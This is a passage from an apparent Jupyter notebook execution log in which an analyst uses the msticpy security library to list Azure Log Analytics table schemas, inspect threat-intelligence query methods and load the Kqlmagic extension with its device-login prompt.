\u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"sSiteName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"scBytes\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"scStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"scSubStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"scWin32Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    }\n}"
+       },
+       "execution_count": 21,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "eb7a9a2f-a277-426b-a95c-e1aeb03864ac",
+     "text": "k_schema"
+    },
+    "executionTime": "2019-08-15T21:20:32.780Z"
+   },
+   {
+    "cell": {
+     "executionCount": 22,
+     "executionEventId": "c73dbca0-fd2c-4710-bd3a-47ee7e2ea511",
+     "hasError": false,
+     "id": "0f4c4710-bcbb-4c1f-a7b6-409f6abf757c",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "dict_keys(['AADDomainServicesAccountLogon', 'AADDomainServicesAccountManagement', 'AADDomainServicesDirectoryServiceAccess', 'AADDomainServicesLogonLogoff', 'AADDomainServicesPolicyChange', 'AADDomainServicesPrivilegeUse', 'AADDomainServicesSystemSecurity', 'ADFActivityRun', 'ADFPipelineRun', 'ADFTriggerRun', 'AWSCloudTrail', 'Alert', 'AppCenterError', 'AuditLogs', 'AutoscaleEvaluationsLog', 'AutoscaleScaleActionsLog', 'AzureActivity', 'AzureDiagnostics', 'AzureMetrics', 'CommonSecurityLog', 'ComputerGroup', 'ContainerRegistryLoginEvents', 'ContainerRegistryRepositoryEvents', 'DatabricksAccounts', 'DatabricksClusters', 'DatabricksDBFS', 'DatabricksJobs', 'DatabricksNotebook', 'DatabricksSQLPermissions', 'DatabricksSSH', 'DatabricksSecrets', 'DatabricksTables', 'DatabricksWorkspace', 'ETWEvent', 'Event', 'Heartbeat', 'HuntingBookmark', 'IntuneAuditLogs', 'IntuneOperationalLogs', 'LinuxAuditLog', 'McasShadowItReporting', 'Microservices4SpringApplicationLogs', 'MicrosoftInsightsAzureActivityLog', 'MicrosoftWebApplicationLog', 'MicrosoftWebFunctionExecutionLogs', 'MicrosoftWebStdOutStdErrLog', 'MicrosoftWebW3CLog', 'OfficeActivity', 'Operation', 'Perf', 'ReservedAzureCommonFields', 'ReservedCommonFields', 'SecurityAlert', 'SecurityEvent', 'ServiceFabricOperationalEvent', 'ServiceFabricReliableActorEvent', 'ServiceFabricReliableServiceEvent', 'SigninLogs', 'Syslog', 'ThreatIntelligenceIndicator', 'Usage', 'W3CIISLog'])"
+       },
+       "execution_count": 22,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "eb7a9a2f-a277-426b-a95c-e1aeb03864ac",
+     "text": "k_schema.keys()"
+    },
+    "executionTime": "2019-08-15T21:20:42.221Z"
+   },
+   {
+    "cell": {
+     "executionCount": 23,
+     "executionEventId": "6738f520-271d-41a1-b32d-ab0d0c58a232",
+     "hasError": false,
+     "id": "0f4c4710-bcbb-4c1f-a7b6-409f6abf757c",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "['AADDomainServicesAccountLogon',\n 'AADDomainServicesAccountManagement',\n 'AADDomainServicesDirectoryServiceAccess',\n 'AADDomainServicesLogonLogoff',\n 'AADDomainServicesPolicyChange',\n 'AADDomainServicesPrivilegeUse',\n 'AADDomainServicesSystemSecurity',\n 'ADFActivityRun',\n 'ADFPipelineRun',\n 'ADFTriggerRun',\n 'AWSCloudTrail',\n 'Alert',\n 'AppCenterError',\n 'AuditLogs',\n 'AutoscaleEvaluationsLog',\n 'AutoscaleScaleActionsLog',\n 'AzureActivity',\n 'AzureDiagnostics',\n 'AzureMetrics',\n 'CommonSecurityLog',\n 'ComputerGroup',\n 'ContainerRegistryLoginEvents',\n 'ContainerRegistryRepositoryEvents',\n 'DatabricksAccounts',\n 'DatabricksClusters',\n 'DatabricksDBFS',\n 'DatabricksJobs',\n 'DatabricksNotebook',\n 'DatabricksSQLPermissions',\n 'DatabricksSSH',\n 'DatabricksSecrets',\n 'DatabricksTables',\n 'DatabricksWorkspace',\n 'ETWEvent',\n 'Event',\n 'Heartbeat',\n 'HuntingBookmark',\n 'IntuneAuditLogs',\n 'IntuneOperationalLogs',\n 'LinuxAuditLog',\n 'McasShadowItReporting',\n 'Microservices4SpringApplicationLogs',\n 'MicrosoftInsightsAzureActivityLog',\n 'MicrosoftWebApplicationLog',\n 'MicrosoftWebFunctionExecutionLogs',\n 'MicrosoftWebStdOutStdErrLog',\n 'MicrosoftWebW3CLog',\n 'OfficeActivity',\n 'Operation',\n 'Perf',\n 'ReservedAzureCommonFields',\n 'ReservedCommonFields',\n 'SecurityAlert',\n 'SecurityEvent',\n 'ServiceFabricOperationalEvent',\n 'ServiceFabricReliableActorEvent',\n 'ServiceFabricReliableServiceEvent',\n 'SigninLogs',\n 'Syslog',\n 'ThreatIntelligenceIndicator',\n 'Usage',\n 'W3CIISLog']"
+       },
+       "execution_count": 23,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "eb7a9a2f-a277-426b-a95c-e1aeb03864ac",
+     "text": "tables = list(k_schema.keys())\ntables"
+    },
+    "executionTime": "2019-08-15T21:21:03.067Z"
+   },
+   {
+    "cell": {
+     "executionCount": 24,
+     "executionEventId": "582eb060-176d-47f4-af45-6113ef4bf405",
+     "hasError": false,
+     "id": "a219b96d-9209-46bf-97fb-b57f810333ee",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "<msticpy.data.data_providers.AttribHolder at 0x19889cda308>"
+       },
+       "execution_count": 24,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "26056680-5fdf-454a-8fbe-81ec0b2154b5",
+     "text": "qry_prov.ThreatIntelligence"
+    },
+    "executionTime": "2019-08-15T21:22:11.283Z"
+   },
+   {
+    "cell": {
+     "executionCount": 25,
+     "executionEventId": "f4a33dca-7236-4bc2-a42a-e42913db9959",
+     "hasError": false,
+     "id": "a219b96d-9209-46bf-97fb-b57f810333ee",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "['__class__',\n '__delattr__',\n '__dict__',\n '__dir__',\n '__doc__',\n '__eq__',\n '__format__',\n '__ge__',\n '__getattribute__',\n '__gt__',\n '__hash__',\n '__init__',\n '__init_subclass__',\n '__iter__',\n '__le__',\n '__len__',\n '__lt__',\n '__module__',\n '__ne__',\n '__new__',\n '__reduce__',\n '__reduce_ex__',\n '__repr__',\n '__setattr__',\n '__sizeof__',\n '__str__',\n '__subclasshook__',\n '__weakref__',\n 'list_indicators',\n 'list_indicators_by_domain',\n 'list_indicators_by_email',\n 'list_indicators_by_filepath',\n 'list_indicators_by_hash',\n 'list_indicators_by_ip',\n 'list_indicators_by_url']"
+       },
+       "execution_count": 25,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "26056680-5fdf-454a-8fbe-81ec0b2154b5",
+     "text": "dir(qry_prov.ThreatIntelligence)"
+    },
+    "executionTime": "2019-08-15T21:22:19.564Z"
+   },
+   {
+    "cell": {
+     "executionCount": 26,
+     "executionEventId": "55efc129-b58c-481b-a5d0-7d6f51623173",
+     "hasError": true,
+     "id": "a219b96d-9209-46bf-97fb-b57f810333ee",
+     "outputs": [
+      {
+       "name": "stdout",
+       "output_type": "stream",
+       "text": "Query:  list_indicators\nData source:  LogAnalytics\nRetrieves list of all current indicators.\n\nParameters\n----------\nadd_query_items: str (optional)\n    Additional query clauses\nend: datetime (optional)\n    Query end time\nobservables: list\n    List of observables\nquery_project: str (optional)\n    Project clause to limit/change return column names\nstart: datetime (optional)\n    Query start time\n    (default value is: -30)\ntable: str (optional)\n    Table name\n    (default value is: ThreatIntelligenceIndicator)\nQuery:\n {table} {query_project} | where TimeGenerated >= datetime({start}) | where TimeGenerated <= datetime({end}) | summarize arg_max(TimeGenerated, *) by IndicatorId {add_query_items}\n"
+      },
+      {
+       "ename": "ValueError",
+       "evalue": "No values found for these parameters: ['observables']",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mValueError\u001b[0m                                Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-26-01ecc7b00257>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mqry_prov\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mThreatIntelligence\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mlist_indicators\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+        "\u001b[1;32me:\\src\\microsoft\\msticpy\\msticpy\\msticpy\\data\\data_providers.py\u001b[0m in \u001b[0;36m_execute_query\u001b[1;34m(self, *args, **kwargs)\u001b[0m\n\u001b[0;32m    245\u001b[0m         \u001b[1;32mif\u001b[0m \u001b[0mmissing\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    246\u001b[0m             \u001b[0mquery_source\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mhelp\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 247\u001b[1;33m             \u001b[1;32mraise\u001b[0m \u001b[0mValueError\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34mf\"No values found for these parameters: {missing}\"\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    248\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    249\u001b[0m         \u001b[0mquery_str\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mquery_source\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mcreate_query\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m**\u001b[0m\u001b[0mparams\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mValueError\u001b[0m: No values found for these parameters: ['observables']"
+       ]
+      }
+     ],
+     "persistentId": "26056680-5fdf-454a-8fbe-81ec0b2154b5",
+     "text": "qry_prov.ThreatIntelligence.list_indicators()"
+    },
+    "executionTime": "2019-08-15T21:22:40.086Z"
+   },
+   {
+    "cell": {
+     "executionCount": 1,
+     "executionEventId": "8bb96ca5-5051-4f08-853b-3461927f2e2d",
+     "hasError": false,
+     "id": "7f936718-3dfa-454b-83b5-823eb4f3f3d9",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "\nThis product includes GeoLite2 data created by MaxMind, available from\n<a href=\"https://www.maxmind.com\">https://www.maxmind.com</a>.\n",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "\nThis library uses services provided by ipstack.\n<a href=\"https://ipstack.com\">https://ipstack.com</a>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      }
+     ],
+     "persistentId": "249a5400-e20e-452e-8d0d-2c65a8856bdf",
+     "text": "# Imports\nimport sys\nimport warnings\n\nfrom msticpy.common.utility import check_py_version\nMIN_REQ_PYTHON = (3,6)\ncheck_py_version(MIN_REQ_PYTHON)\n\nfrom IPython import get_ipython\nfrom IPython.display import display, HTML, Markdown\nimport ipywidgets as widgets\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\nimport networkx as nx\n\nimport pandas as pd\npd.set_option('display.max_rows', 100)\npd.set_option('display.max_columns', 50)\npd.set_option('display.max_colwidth', 100)\n\nfrom msticpy.data import QueryProvider\nfrom msticpy.nbtools import *\nfrom msticpy.sectools import *\nfrom msticpy.nbtools.foliummap import FoliumMap\n\nWIDGET_DEFAULTS = {'layout': widgets.Layout(width='95%'),\n                   'style': {'description_width': 'initial'}}\n\n# Some of our dependencies (networkx) still use deprecated Matplotlib\n# APIs - we can't do anything about it so suppress them from view\nfrom matplotlib import MatplotlibDeprecationWarning\nwarnings.simplefilter(\"ignore\", category=MatplotlibDeprecationWarning)\n\n"
+    },
+    "executionTime": "2019-08-15T21:31:42.502Z"
+   },
+   {
+    "cell": {
+     "executionCount": 2,
+     "executionEventId": "e0883897-7de4-42dc-86bb-ce94b49dad18",
+     "hasError": false,
+     "id": "63503871-cff8-4a4f-8907-13a087cc5338",
+     "outputs": [
+      {
+       "name": "stdout",
+       "output_type": "stream",
+       "text": "Please wait. Loading Kqlmagic extension...\n"
+      },
+      {
+       "data": {
+        "text/html": "<html>\n            <head>\n            <style>\n            .kql-magic-banner {\n                display: flex; \n                background-color: #d9edf7;\n            }\n            .kql-magic-banner > div {\n                margin: 10px; \n                padding: 20px; \n                color: #3a87ad; \n                font-size: 13px;\n            }\n            </style>\n            </head>\n            <body>\n                <div class='kql-magic-banner'>\n                    <div><img src='data:image/png;base64,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'></div>\n                    <div>\n                        <p>Kql Query Language, aka kql, is the query language for advanced analytics on Azure Monitor resources. The current supported data sources are \n                        Azure Data Explorer (Kusto), Log Analytics and Application Insights. To get more information execute '%kql --help \"kql\"'</p>\n                        <p>   &bull; kql reference: Click on 'Help' tab > and Select 'kql reference' or execute '%kql --help \"kql\"'<br>\n                          &bull; Kqlmagic configuration: execute '%config Kqlmagic'<br>\n                          &bull; Kqlmagic usage: execute '%kql --usage'<br>\n                    </div>\n                </div>\n            </body>\n            </html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "<html>\n        <head>\n        \n        </head>\n        <body>\n        <div><p style='padding: 10px; color: #3a87ad; background-color: #d9edf7; border-color: #bce9f1'>Kqlmagic&nbsp;package&nbsp;is&nbsp;updated&nbsp;frequently.&nbsp;Run&nbsp;&apos;!pip&nbsp;install&nbsp;Kqlmagic&nbsp;--no-cache-dir&nbsp;--upgrade&apos;&nbsp;to&nbsp;use&nbsp;the&nbsp;latest&nbsp;version.<br>Kqlmagic&nbsp;version:&nbsp;0.1.101,&nbsp;source:&nbsp;https://github.com/Microsoft/jupyter-Kqlmagic</p></div>\n        </body>\n        </html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "application/javascript": "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}",
+        "text/plain": "<IPython.core.display.Javascript object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "application/javascript": "try {IPython.notebook.kernel.reconnect();} catch(err) {;}",
+        "text/plain": "<IPython.core.display.Javascript object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "application/javascript": "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}",
+        "text/plain": "<IPython.core.display.Javascript object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "<!DOCTYPE html>\n                    <html><body>\n\n                    <!-- h1 id=\"user_code_p\"><b>BNK86MVMC</b><br></h1-->\n\n                    <input  id=\"kql_MagicCodeAuthInput\" type=\"text\" readonly style=\"font-weight: bold; border: none;\" size = '9' value='BNK86MVMC'>\n\n                    <button id='kql_MagicCodeAuth_button', onclick=\"this.style.visibility='hidden';kql_MagicCodeAuthFunction()\">Copy code to clipboard and authenticate</button>\n\n                    <script>\n                    var kql_MagicUserCodeAuthWindow = null\n                    function kql_MagicCodeAuthFunction() {\n                        /* Get the text field */\n                        var copyText = document.getElementById(\"kql_MagicCodeAuthInput\");\n\n                        /* Select the text field */\n                        copyText.select();\n\n                        /* Copy the text inside the text field */\n                        document.execCommand(\"copy\");\n\n                        /* Alert the copied text */\n                        // alert(\"Copied the text: \" + copyText.value);\n\n                        var w = screen.width / 2;\n                        var h = screen.height / 2;\n                        params = 'width='+w+',height='+h\n                        kql_MagicUserCodeAuthWindow = window.open('https://microsoft.com/devicelogin', 'kql_MagicUserCodeAuthWindow', params);\n\n                        // TODO: save selected cell index, so that the clear will be done on the lince cell\n                    }\n                    </script>\n\n                    </body></html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "<!DOCTYPE html>\n                    <html><body><script>\n\n                        // close authentication window\n                        if (kql_MagicUserCodeAuthWindow && kql_MagicUserCodeAuthWindow.opener != null && !kql_MagicUserCodeAuthWindow.closed) {\n                            kql_MagicUserCodeAuthWindow.close()\n                        }\n                        // TODO: make sure, you clear the right cell. BTW, not sure it is a must to do any clearing\n\n                        // clear output cell\n                        Jupyter.notebook.clear_output(Jupyter.notebook.get_selected_index())\n\n                        // TODO: if in run all mode, move to last cell, otherwise move to next cell\n                        // move to next cell\n\n                    </script></body></html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "<!DOCTYPE html>\n            <html><body>\n\n            <button onclick=\"this.style.visibility='visible';kql_MagicLaunchWindowFunction('Kqlmagic_temp_files/_a927809c-8142-43e1-96b3-4ad87cfe95a3_at_loganalytics_schema.html','fullscreen=no,directories=no,location=no,menubar=no,resizable=yes,scrollbars=yes,status=no,titlebar=no,toolbar=no,','_a927809c_8142_43e1_96b3_4ad87cfe95a3_at_loganalytics_schema','')\">popup schema a927809c-8142-43e1-96b3-4ad87cfe95a3@loganalytics</button>\n\n            <script>\n\n            function kql_MagicLaunchWindowFunction(file_path, window_params, window_name, notebooks_host) {\n                var url;\n                if (file_path.startsWith('http')) {\n                    url = file_path;\n                } else {\n                    var base_url = '';\n\n                    // check if azure notebook\n                    var azure_host = (notebooks_host == null || notebooks_host.length == 0) ? 'https://notebooks.azure.com' : notebooks_host;\n                    var start = azure_host.search('//');\n                    var azure_host_suffix = '.' + azure_host.substring(start+2);\n\n                    var loc = String(window.location);\n                    var end = loc.search(azure_host_suffix);\n                    start = loc.search('//');\n                    if (start > 0 && end > 0) {\n                        var parts = loc.substring(start+2, end).split('-');\n                        if (parts.length == 2) {\n                            var library = parts[0];\n                            var user = parts[1];\n                            base_url = azure_host + '/api/user/' +user+ '/library/' +library+ '/html/';\n                        }\n                    }\n\n                    // check if local jupyter lab\n                    if (base_url.length == 0) {\n                        var configDataScipt  = 